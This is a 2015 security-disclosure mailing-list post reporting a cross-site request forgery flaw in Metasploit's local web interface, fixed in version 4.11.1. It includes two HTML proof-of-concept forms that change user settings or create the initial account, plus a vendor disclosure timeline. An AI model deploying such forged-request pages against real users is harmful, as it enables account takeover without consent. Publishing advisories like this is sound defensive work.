Date: Mon, 16 Mar 2015 01:36:41 +0200
From: "Mohamed A. Baset" <symbian2010@...il.com>
To: bugtraq@...urityfocus.com, fulldisclosure@...lists.org, 
	Inj3ct0r <mr.inj3ct0r@...il.com>,
	Packet Storm <packet@...ketstormsecurity.com>, 
	submit@...sec.com, "cve-assign@...re.org" <cve-assign@...re.org>
Subject: [FD] Metasploit Project initial User Creation CSRF

# Exploit Title: Metasploit Project initial User Creation CSRF
# Google Dork: N/A
# Date: 14-2-2015
# Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh)
# Vendor Homepage: http://www.metasploit.com/
# Software Link:
http://www.rapid7.com/products/metasploit/editions-and-features.jsp
# Version: Free/Pro < 4.11.1 (Update 2015021901)
# Tested on: All OS
# CVE : N/A

Vulnerability:
Cross Site Request Forgery - (CSRF)

Info:
http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

More Details:
After doing some research, i have found that the anti csrf token
"authenticity_token" value is not validated from the local server side
which will result in a more csrf attack scenario around the whole local
metasploit project.

Affected URL(s)/PoC Code(s):
-Change Local Metasploit Project User Settings
<html>
<body>
<form action="https://127.0.0.1:3790/users/1" method="POST">
<input type="hidden" name="utf8" value="â&#156;&#147;" />
<input type="hidden" name="&#95;method" value="put" />
<input type="hidden" name="authenticity&#95;token" value="" />
<input type="hidden" name="user&#91;fullname&#93;" value="Attacker" />
<input type="hidden" name="user&#91;email&#93;" value="EMAIL" />
<input type="hidden" name="user&#91;company&#93;" value="COMPANY" />
<input type="hidden" name="user&#91;time&#95;zone&#93;" value="Cairo" />
<input type="hidden" name="commit" value="Save&#32;Settings" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

-Full Local Metasploit Project Account Takeover before setting up the first
user settings
<html>
<body>
<form action="https://127.0.0.1:3790/users" method="POST">
<input type="hidden" name="utf8" value="â&#156;&#147;" />
<input type="hidden" name="authenticity&#95;token" value="" />
<input type="hidden" name="user&#91;username&#93;" value="Username" />
<input type="hidden" name="user&#91;password&#93;" value="PASSWORD" />
<input type="hidden" name="user&#91;password&#95;confirmation&#93;"
value="PASSWORD" />
<input type="hidden" name="user&#91;fullname&#93;" value="FUll_Name" />
<input type="hidden" name="user&#91;email&#93;" value="EMAIL" />
<input type="hidden" name="user&#91;company&#93;" value="COMPANY" />
<input type="hidden" name="user&#91;time&#95;zone&#93;" value="Cairo" />
<input type="hidden" name="commit" value="Create&#32;Account" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>


More Details/Impact:
-Change Local Metasploit Project User Settings
-Full Local Metasploit Project Account Takeover before setting up the first
user settings

Report Timeline:
[-] 14/02/2015: Reported to Rapid7 Security Team
[-] 14/02/2015: Initial Reply from HD Moore acknowledging the vulnerability
[-] 17/02/2015: Reply from "Eray Yilmaz" about the Operation and public
disclosure rules
[-] 20/02/2015: Reply from "Eray Yilmaz" about releasing a patch for the
vulnerability in place, Fixed in Update 4.11.1 (Update 2015021901),
https://community.rapid7.com/docs/DOC-3010
[-] 16/03/2015: Public Disclosure

Thanks

-- 
*Best Regards**,**,*


*Mohamed Abdelbaset Elnoby*Guru Programmer, Information Security Evangelist
& Bug Bounty Hunter.
LinkedIn
<https://www.linkedin.com/in/symbiansymoh>Curriculum Vitae
<http://goo.gl/cNrVpL>
<https://www.linkedin.com/in/symbiansymoh>Facebook
<https://fb.com/symbiansymoh>Twitter
<https://twitter.com/symbiansymoh>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists